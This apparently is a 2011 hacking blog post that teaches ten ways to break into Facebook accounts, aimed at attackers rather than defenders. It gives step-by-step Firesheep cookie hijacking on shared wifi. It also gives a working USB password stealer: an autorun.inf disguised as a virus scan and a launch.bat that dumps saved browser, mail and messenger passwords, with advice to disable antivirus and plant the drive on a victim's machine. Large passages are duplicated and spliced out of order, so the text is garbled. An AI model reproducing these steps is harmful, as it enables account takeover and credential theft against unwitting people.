Facebook is one of the most widely used social networking site with more than 750 million users, as a reason if which it has become the number 1 target of hackers,
read my previous post about 4 ways to hack facebook accounts.
So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2011.
FACEBOOK PHISHING( Fake login Page.)
With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account
What is Session Hijacking?
In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account
How can a Hacker use Firesheep to Hack a Facebook or any other account?
Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
The most popular Mobile Phone Spying softwares are:
1. Mobile Spy
2. Spy Phone Gold
7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.
read my previous post about 4 ways to hack facebook accounts.
So in this post I will write the top 10 methods how hackers can hack facebook accounts in 2011.
FACEBOOK PHISHING( Fake login Page.)
There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.
I have explained the step by step phishing process in my post below:
2. Keylogging
Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.
want to know more about RATs ? read my previous post abouts RATs.
3. Stealers
Almost 80% percent people use stored passwords in their browser to access the facebook, This is is quite convenient but can sometimes be extremely dangerous, Stealers are software's specially designed to capture the saved passwords stored in the victims browser, Stealers once FUD can be extremely powerful.
4. Session Hijacking
Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's.
5. Sidejacking With Firesheep
Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.
What is Session Hijacking?
In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account
How can a Hacker use Firesheep to Hack a Facebook or any other account?
Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:
Method
1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser
2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep
3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly.
1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser
2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep
3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly.
:)
6. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
The most popular Mobile Phone Spying softwares are:
1. Mobile Spy
2. Spy Phone Gold
7. DNS Spoofing
If both the victim and attacker are on the same network, an attacker can use a DNS spoofing attack and change the original facebook.com page to his own fake page and hence can get access to victims facebook account.
8. USB Hacking
As we know that windows stores most of its passwords on daily basis , Such as Msn messenger passwords,Yahoo passwords,Myspace passwords etc.Most of people have lack of time and they had just asked their Browser/windows to save their passwords,As we know that there are many tools to recover Saved passwords, i will explain you on How to made a USB passwords stealer and steal saved passwords.
Things you will need?
MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:
Note:Kindly disable your antivirus before performing these steps
1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
MessenPass - MessenPass is a password recovery tool that reveals the passwords of the following instant messenger applications:
Mail PassView - Mail PassView is a small password-recovery tool that reveals the passwords and other account details for Outlook express,windows mail,POP3 etc
IE Passview - IE passview is a small program that helps us view stored passwords in Internet explorer.
Protected storage pass viewer(PSPV) - Protected Storage PassView is a small utility that reveals the passwords stored on your computer by Internet Explorer, Outlook Express and MSN Explorer.
Password Fox - Password fox is a small program used to view Stored passwords in Mozilla Firefox.
Now here is a step by step tutorial to create a USB password stealer to steal saved passwords:
Note:Kindly disable your antivirus before performing these steps
1.First of all download all 5 tools and copy the executables (.exe( files in your USB i.e. Copy the files mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it it will steal passwords.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scansave the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy the autorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your USB Password stealer is ready all you have to do is insert it in your victims computer and a popup will appear, in the popup window select the option (Launch virus scan) as soon as you will click it it will steal passwords.
After this you can see saved password in .TXT files
9. Man In the Middle Attacks
If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article.
If the victim and attacker are on the same lan and on a switch based network, A hacker can place himself b/w the client and the server or he could also act as a default gateway and hence capturing all the traffic in between, ARP Poisoning which is the other name for man in the middle attacks is a very broad topic and is beyond the scope of this article.
f you are really interested in learning how man in the middle attacks, you can view the presentation below by oxid.it.
10. Botnets
Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.
Botnets are not commonly used for hacking facebook accounts, because of it's high setup costs, They are used to carry more advanced attacks, A botnet is basically a collection of compromised computer, The infection process is same as the keylogging, however a botnet gives you, additional options in for carrying out attacks with the compromised computer. Some of the most popular botnets include Spyeye and Zeus.
Hope you have enjoyed reading the post.
be our fan on facebook
0 comments:
Post a Comment